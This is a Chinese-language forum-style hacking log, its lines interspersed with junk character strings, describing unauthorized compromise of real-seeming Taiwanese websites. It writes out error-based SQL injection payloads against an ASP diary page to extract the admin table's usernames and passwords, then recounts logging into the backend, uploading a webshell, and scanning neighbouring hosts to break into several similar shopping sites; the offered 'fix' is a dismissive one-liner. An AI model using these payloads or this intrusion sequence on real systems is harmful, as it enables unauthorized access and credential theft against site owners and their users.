发现一个注入点1 L# A) G0 z: q- R4 D2 O+ F) W
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
* @3 V/ \' y9 Z9 W9 z
' q' W% Y/ a( P* p习惯性的加’having1=1--
: @- A; ? R0 ~2 P4 Y3 L+ l, C3 a, d2 v& b J7 p3 C6 R
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
* Y* T: @% p5 K" \$ f
- F" E8 u; h+ W9 A0" |5 G1 g; B5 H/ W" n! R) e
' t. i) U) ^, i' E5 i3 T" k爆出Diary_A.dl_Title(这时候很激动啊)
! i1 T3 u( F" @. d/ g: c8 J2 o( N, G. v+ R% Z7 k+ ^6 }8 O+ ^
那么继续
9 z% Y% v) Z6 G8 `; |http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—( l+ a. U5 d/ k2 ^0 G2 ?
, h) k& J, s8 p6 l+ n' G0 F继续,一直爆下去
! P. s1 d, I% M. `0 [# W
9 o# k ~0 o" M+ A2 C爆到几个字段和表段 但是没找到需要的管理用户的字段
k" x4 E2 }2 A6 Q- l6 n1 K% n4 { h# f; T
蛋疼了 怎么办 然后去后台登陆页看源码6 x+ T: G1 F1 U4 `; S9 H
, u/ @& ~$ J% n3 F- f e, N, t( D0$ E0 V5 t2 X4 c4 N
" p( f, X9 E/ R8 ^& O4 X1 e
Input name= “ADUID”
; Z: [- H0 w& ?; O p" d$ EInput name= “ADPWD”
5 j0 l4 m. P+ C V+ B/ R/ d/ z$ u/ Y
很幸运 找到了字段那就继续
9 X% B- i$ e5 R( E! I2 E+ n8 n找到之后开始爆用户( l6 {7 v8 a: ] p) b( Q+ m
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
* D' N$ n4 \- n* k% a8 O9 W爆密码1 @! |, S3 w5 V- ^
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
# |! }6 S1 v. d7 S测试了下 这个注入点只能爆到文章哪里的表
& ~% z3 G& r9 M, P Q! w% K! @# n' f; \' Z! S6 E+ |
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了 X- N/ S. R) D5 c
, A. B6 u( [% g4 J, [
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
3 O1 p" y) j, e5 z, s
. ?! r B4 m. y! q8 p: D3 I" x. W473
* e {- f5 I1 z6 E3 y/ P* N
! m% h6 Z: s2 m9 x& y! L+ p进后台8 f+ u- b1 A) t
6 `- M2 k) w2 K! M+ M# w* l9 N
& J5 X) o8 }2 _4 _* Z& n7 h发现几个上传点 有的地方不能上传 而且防止恶意代码( m, W' n/ \+ ]" R$ ]
& S; Z4 J6 S! q0 `* z! ?' B/ [* g没办法 各种百度各种找大牛 找到一只好像可以突破的马
) u) W7 G+ M4 `3 `/ u" w" _. `/ ?1 s
5 i$ n @( t8 m
在系统管理那里直接上传 不过没有显示地址
9 n8 b8 |# y& W/ B
; {; m; o4 G5 v4 y9 @# }! k再上传一次 抓包 搞定OK
- s# g4 g- b- M9 G& `! d( F3 T$ p; x9 W: A1 q
- K% _' N. C0 M5 m l8 E7 R7 t0 }2 f' L- I+ m' M
472/ T0 n% I4 q1 P0 T: `7 ?" f: B
M) M1 U9 g5 ]* s5 V" y晚上不行了 去睡觉。。。, E3 M4 B) M* K" s" N# H0 |1 s( F
第二天刚起床 闲的没事做继续日站吧 u6 ]5 E, Y/ h. q
- ]( Z$ W; u: T. s* g- S# b
找个站 就把这个站的旁c扫了下
0 V9 ?* [, d/ @" g. g* F/ D7 o! v7 U6 O
发现c段也有一个购物站 ,然后还和这个站的模板差不多
. ]% Z3 t5 s) B8 g; E+ B( Q
3 G' X) k: g; A" ]+ T就找到会员登录口测试
# r% f! u, U' A. w2 d5 o% t' z- b4 Y+ q E* {/ ]* j
'and (select top 1 MGR_UID from A_MGR)>0—
8 b9 X* }5 B* v果断爆到了 这时候我很激动 通杀4 }, c# e; r0 {$ m2 [
4 a/ z" E4 o- c& ~" _- O
再次翻c段4 n, I. Y& f1 Y: T
9 j" c- P$ w: D g! I+ }, a翻出几个站 都成功拿下
5 U: ^# o B8 f# R& Q5 O6 u" @: f: i$ [" y
- v( c3 g; }& { F' A/ U2 K
: |6 y5 h% ~0 q3 u修复方案:
+ y/ F7 D) k t3 V9 S F他们比我专业
) P) |, f5 A: ^3 a
5 S: C7 c7 S, v2 Y6 U$ n' N, @: P
( e7 A+ C$ r% x0 @1 Q4 g* S, _
- i9 L9 N. [$ D# x) [ |